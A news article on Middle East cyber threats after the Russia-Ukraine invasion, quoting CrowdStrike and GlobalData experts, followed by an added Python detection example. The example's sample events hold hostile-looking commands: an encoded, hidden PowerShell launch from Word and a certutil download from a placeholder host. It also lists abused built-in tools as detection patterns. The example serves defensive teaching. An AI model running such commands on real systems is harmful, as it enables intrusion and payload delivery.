- Enterprises should strengthen cybersecurity defences amid the crisis.
- Malicious activities are coming from new countries that were usually not very active on the nation-state attacks scene.
- The war serves as a stark reminder of the importance of identifying the threat model and altering risk management objectives accordingly.
The Middle East has not been spared the repercussions of the Russia-Ukraine conflict: the impact has already been felt on the supply chain, and the region faces a heightened risk of cyberwarfare, a cybersecurity expert said.
“Our CrowdStrike Falcon platform is noting the heightened level of security incidents that are taking place daily and an elevated number of the nation-state, state-sponsored attacks and some eCrime actors as well that traditionally operated from East European and Russian geography are also getting involved in the cyber warfare,” Roland Daccache, Systems Engineering Manager for Middle East and Africa at CrowdStrike, told TechChannel News during the GISEC Global 2022 event.
The three-day event is taking place from 21st-23rd March at Dubai World Trade Centre.
Moreover, he said that many countries are taking sides in new cyberwarfare setups.
“We see malicious activities coming from new countries that were usually not very active on the nation-state attacks. The Conti ransomware gang, splitting between the Ukrainian and Russian supporters, has exposed their operations last month,” he said.
Conti is a ransomware-as-a-service group that allows affiliates to rent access to its infrastructure to launch attacks.
Experts said that Conti is based in Russia and may have ties to Russian intelligence.
Spending more on cybersecurity
“All countries are strengthening their cybersecurity infrastructure, especially after the Russian-Ukraine conflict. All NATO countries need to spend two per cent of their GDP on defence but now we have seen that the movement has reversed,” Daccache said.
“Now, we see that these countries are spending more and for cybersecurity defence and more investment from a national level, European bloc level and American administration level for defensive and offensive levels,” he said.
Finland’s Ministry of the Interior and Ministry of Defense have initiated a project to assess the authorities’ capabilities to maintain national cybersecurity, prevent cybercrime, implement cyber defence, and respond to highly dynamic conditions that risk society’s cybersecurity.
The project will examine the authorities’ current operational circumstances in serious crises, such as the Russia-Ukraine conflict that jeopardises national cybersecurity, and identify key development needs. Separately, Italy has warned that using Russian computer software may carry a “technological risk” following the invasion of Ukraine.
Importance of identifying the model
Manish Dixit, Principal Disruptive Tech Analyst at GlobalData, said that malicious state-sponsored cyber-activities have historically escalated when geopolitical tensions are high.
“Concerns about increased cyber activity amidst the Russia-Ukraine crisis serve as a stark reminder of the importance of identifying the threat model and altering risk management objectives accordingly.”
Pranjali Mujumdar, Disruptive Tech Analyst at GlobalData, said that destructive malware can be a direct threat to a company’s daily operations, posing risk to key assets and data.
Every company, regardless of size, she said, must act quickly to secure its information technology infrastructure.
“A robust cybersecurity infrastructure will help companies to identify and thwart cyberattacks, as well as remain secure throughout the security lifecycle,” she said.
Daccache said that the increase in targeted attacks in the Middle East in 2021 was notable and that the trend is likely to continue.
On a global level, he said the average demand for a ransom is about $6 million, up 36 per cent from 2020.
“Our intelligence team is detecting more than 50 targeted ransomware attacks per week, and over the year we observed more than 2,700 big game hunting incidents. On a global scale as well as on a regional scale, we see a tendency for cyberattacks to grow in scale, in number and impact,” he said.
New wave of cyberattacks
When it comes to nation-state attacks on the Middle East, Daccache said that they have seen two main trends: elevated exploitation of known vulnerabilities by Chinese threat actors, and activity originating from Russia.
“We have seen Fancy Bear, from Russia, shifting from on-prem to cloud assets. We have to brace ourselves for a new wave of cyberattacks that does not target just endpoints but also networks, cloud workloads, SaaS applications. Bad guys are ready to hit enterprises that have digital footprints,” he said.
Organisations have to prepare for a wave of attacks from both nation-state and eCrime actors this year, he said; from an eCrime perspective, Saudi Arabia, the UAE, Egypt and Qatar are the most targeted countries in the Middle East.
“The more you are exposed digitally, the more you are prone to cyberattacks,” he said.
When asked whether too much digitisation globally is creating an opportunity for hackers, he said: “absolutely yes”.
The reason, he said, is that the more targets attackers have, the more likely they are to succeed.
VPN gateways, cloud workloads, on-prem software, supply chain software, domain controllers and Exchange servers are all being targeted.
Digitisation poses risk
“The more digital assets we have and the more digital services we offer, the risk is bigger and we have to apply multiple layered defences around every digital solution that we adopt to maintain the same level of security when we expand our digital footprint,” Daccache said.
As the digital transformation is gaining pace, the cybersecurity solution providers and the hackers are also keeping pace, he said.
“The attacks are becoming more sophisticated. So, the cybersecurity solutions industry must become much more proactive to adapt to the fact that threat actors are also innovating like using machine learning and artificial intelligence and their form of threat intelligence and collaboration.
“We have seen the proliferation of access brokers and proliferation of tools that are at their disposal of eCrime actors. Cybersecurity needs to invest more in outlasting the threat actors. It is an everlasting cat and mouse game but we need to innovate to stop the modern threat actors,” he said.
However, he said that vendors that do not offer AI and ML capabilities will not be in the cybersecurity industry in the next couple of years.
The reason behind this, he said, is that traditional signature-based or rule-based solutions, such as antivirus and firewalls, are not up to par with modern sophisticated attacks.
Skills gap to get worse
There is a shortage of cybersecurity skills globally and it is going to get worse, Daccache said, and because of that CIOs and CISOs face difficult decisions about how to prioritise budget spending.
“They have to look at options where they do not have to figure everything out on their own or build every capability on their own. While building their software, if you are not a very large company, outsourcing that service to a managed detection and response service can go a long way in giving you access to top security skills without having everything on your payroll,” he said.
So, he said, CIOs and CISOs need to spend their budget on the areas of highest priority, such as securing endpoints and securing the cloud.
“So, you have to modernise the type of technologies that you use to stop modern attacks. Adopt more cloud-native technologies and less on-prem to protect your environment,” he said.
However, he said that there is a misconception that workloads in the cloud are protected by the cloud providers but that is not the case.
“You have to apply the same level or the same mindset that you use to protect your on-prem assets. There is no escape today from adopting cloud technologies. The cybersecurity teams of the organisations need to work hand in hand with the IT teams and business process owners to make sure that they cover the right cybersecurity measures at every step of the way in becoming more digital,” he said.
Consolidation to intensify
When asked whether there is a need for consolidation in the cybersecurity industry, Daccache said that customers are tired of siloed solutions and that, whenever a breach happens, only a few providers have the answers.
“That is why consolidation has started to appear in the market,” he said.
For example, EDR and endpoint security are merging into a single product, and vulnerability management and asset discovery are becoming features of endpoint security products.
“The technology stack is becoming more condensed now and customers have to look only at fewer places. But this impacts the business of cybersecurity. So, I see the trend of bigger companies acquiring small ones is going to be a trend,” he said.
Recently, Google signed an agreement to acquire Virginia-based cybersecurity company Mandiant in an all-cash transaction valued at $5.4 billion, having acquired Siemplify in January.
According to 451 Research, the first three quarters of last year saw 151 transactions, up from 94 for the same period in 2020, and the trend is likely to continue this year also.
Check Point is acquiring Israel-based Spectral, web security and performance company Cloudflare has bought Vectrix, Forescout Technologies has acquired healthcare cybersecurity firm CyberMDX, Juniper Networks has acquired WiteSand, and Nord Security and Surfshark have announced their merger.
Bad guys are becoming intelligent
With the prevailing geopolitical tensions threatening to disrupt and undermine technology industries and spread well beyond national borders, experts said that there are concerns about cyberattacks, particularly in the critical infrastructure space.
“Both Russia and Ukraine have a high level of expertise in information technology and computer hacking, thus, cyberwarfare can not only target big companies or government organisations; any small business involved in the public sector’s supply chain will also be vulnerable,” Mujumdar said.
Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, Daccache said; he has observed hackers using legitimate credentials and built-in tools in a deliberate effort to evade detection by legacy antivirus products.
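To illustrate the two points above (signature-based tools falling short, and attackers using legitimate credentials with built-in tools), here is an added example that is not from the article or from CrowdStrike: a hash-based verdict and a behavioural verdict run over constructed process-creation events. The hash list, user names and command lines are placeholders invented for the example.

```python
"""Added example (not from the article): a hash/signature check misses
'living off the land' activity, while a behavioural rule catches it.
All events and hashes below are constructed placeholders."""
from dataclasses import dataclass

# Constructed placeholder signature list; not a real indicator.
KNOWN_BAD_HASHES = {"deadbeef" * 8}

# Trusted built-in Windows tools commonly abused precisely because they are signed and allowed.
BUILTIN_TOOLS = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe", "wmic.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
DOWNLOAD_OR_DECODE = ("-encodedcommand", "-enc ", "downloadstring", "urlcache", "http://", "https://")


@dataclass
class ProcEvent:
    user: str      # legitimate account running the process
    image: str     # executable name
    sha256: str    # hash of the executable
    cmdline: str
    parent: str    # parent process image


def signature_verdict(ev: ProcEvent) -> bool:
    """Legacy style: alert only if the executable hash is on the bad list.
    A built-in tool never matches, so credential-plus-tool abuse is invisible here."""
    return ev.sha256 in KNOWN_BAD_HASHES


def behaviour_verdict(ev: ProcEvent) -> bool:
    """Behavioural rule: a trusted built-in tool spawned by an Office application,
    or launched with a command line that downloads or decodes content."""
    if ev.image.lower() not in BUILTIN_TOOLS:
        return False
    cmd = ev.cmdline.lower()
    suspicious_parent = ev.parent.lower() in OFFICE_PARENTS
    suspicious_cmd = any(marker in cmd for marker in DOWNLOAD_OR_DECODE)
    return suspicious_parent or suspicious_cmd


# Constructed sample events: no real hosts, users or hashes.
SAMPLE_EVENTS = [
    ProcEvent("corp\\jdoe", "powershell.exe", "11" * 32, "powershell.exe -nop -w hidden -enc AAAA", "winword.exe"),
    ProcEvent("corp\\svc-backup", "certutil.exe", "22" * 32, "certutil.exe -urlcache -split -f https://example.invalid/a.txt a.txt", "cmd.exe"),
    ProcEvent("corp\\admin", "powershell.exe", "11" * 32, "powershell.exe Get-Service", "explorer.exe"),
]


def triage(events):
    """Return (user, image, signature_hit, behaviour_hit) per event for comparison."""
    return [(ev.user, ev.image, signature_verdict(ev), behaviour_verdict(ev)) for ev in events]
```

The signature check returns no hits for any of the three events, while the behavioural rule flags the first two and leaves the routine administrative PowerShell use alone.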